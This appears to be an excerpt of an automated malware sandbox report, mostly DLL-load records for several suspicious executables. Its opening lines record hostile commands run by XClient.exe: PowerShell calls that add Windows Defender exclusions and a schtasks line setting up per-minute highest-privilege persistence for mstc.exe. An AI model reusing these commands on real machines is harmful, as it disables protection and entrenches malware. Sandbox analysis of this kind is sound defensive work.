Source: C:\ProgramData\XClient.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'	Jump to behavior
Source: C:\ProgramData\XClient.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\mstc.exe'	Jump to behavior
Source: C:\ProgramData\XClient.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'mstc.exe'	Jump to behavior
Source: C:\ProgramData\XClient.exe	Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "mstc" /tr "C:\Users\user\AppData\Local\Temp\mstc.exe"	Jump to behavior

Source: C:\Users\user\Desktop\Output.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\Output.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Output.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Output.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Output.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Output.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Output.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Output.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Output.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Output.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\Output.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Output.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Output.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Output.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\Output.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Output.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\Output.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\Output.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\Output.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Output.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\Output.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\Output.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Output.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Output.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\Output.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\Output.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Output.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Output.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Output.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\Output.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\ProgramData\XClient.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\ProgramData\XClient.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\ProgramData\XClient.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\ProgramData\XClient.exe	Section loaded: version.dll	Jump to behavior
Source: C:\ProgramData\XClient.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\ProgramData\XClient.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\ProgramData\XClient.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\ProgramData\XClient.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\ProgramData\XClient.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\ProgramData\XClient.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\ProgramData\XClient.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\ProgramData\XClient.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\ProgramData\XClient.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\ProgramData\XClient.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\ProgramData\XClient.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\ProgramData\XClient.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\ProgramData\XClient.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\ProgramData\XClient.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\ProgramData\XClient.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\ProgramData\XClient.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\ProgramData\XClient.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\ProgramData\XClient.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\ProgramData\XClient.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\ProgramData\XClient.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\ProgramData\XClient.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\ProgramData\XClient.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\ProgramData\XClient.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\ProgramData\XClient.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\ProgramData\XClient.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\ProgramData\XClient.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\ProgramData\XClient.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\ProgramData\XClient.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\ProgramData\XClient.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\ProgramData\XClient.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\ProgramData\XClient.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\ProgramData\XClient.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\ProgramData\XClient.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\ProgramData\XClient.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\ProgramData\XClient.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\ProgramData\XClient.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\ProgramData\XClient.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\ProgramData\XClient.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\ProgramData\XClient.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\ProgramData\XClient.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\ProgramData\XClient.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\ProgramData\XClient.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\ProgramData\XClient.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\ProgramData\XClient.exe	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\ProgramData\XClient.exe	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\ProgramData\XClient.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\ProgramData\XClient.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\ProgramData\XClient.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\ProgramData\XClient.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\ProgramData\XClient.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\ProgramData\XClient.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\ProgramData\XClient.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\ProgramData\XClient.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\ProgramData\XClient.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\ProgramData\XClient.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\ProgramData\XClient.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\ProgramData\XClient.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\ProgramData\XClient.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\ProgramData\XClient.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\ProgramData\XClient.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\ProgramData\XClient.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\ProgramData\XClient.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\ProgramData\build.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\ProgramData\build.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\ProgramData\build.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\ProgramData\build.exe	Section loaded: version.dll	Jump to behavior
Source: C:\ProgramData\build.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\ProgramData\build.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\ProgramData\build.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\ProgramData\build.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\ProgramData\build.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\ProgramData\build.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\ProgramData\build.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\ProgramData\build.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\ProgramData\build.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\ProgramData\build.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\ProgramData\build.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\ProgramData\build.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\ProgramData\build.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\ProgramData\build.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\ProgramData\build.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\ProgramData\build.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\ProgramData\build.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\ProgramData\build.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Users\user\AppData\Local\Temp\mstc.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\mstc.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\mstc.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\mstc.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\mstc.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\mstc.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\mstc.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\mstc.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\mstc.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\mstc.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\mstc.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\mstc.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\mstc.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\mstc.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\mstc.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\mstc.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\mstc.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\mstc.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\mstc.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\mstc.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\mstc.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\mstc.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\mstc.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\mstc.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\mstc.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\mstc.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\mstc.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\mstc.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\mstc.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\mstc.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\mstc.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\mstc.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\mstc.exe	Section loaded: cryptbase.dll

Source: C:\Users\user\Desktop\Output.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: mstc.lnk.2.dr

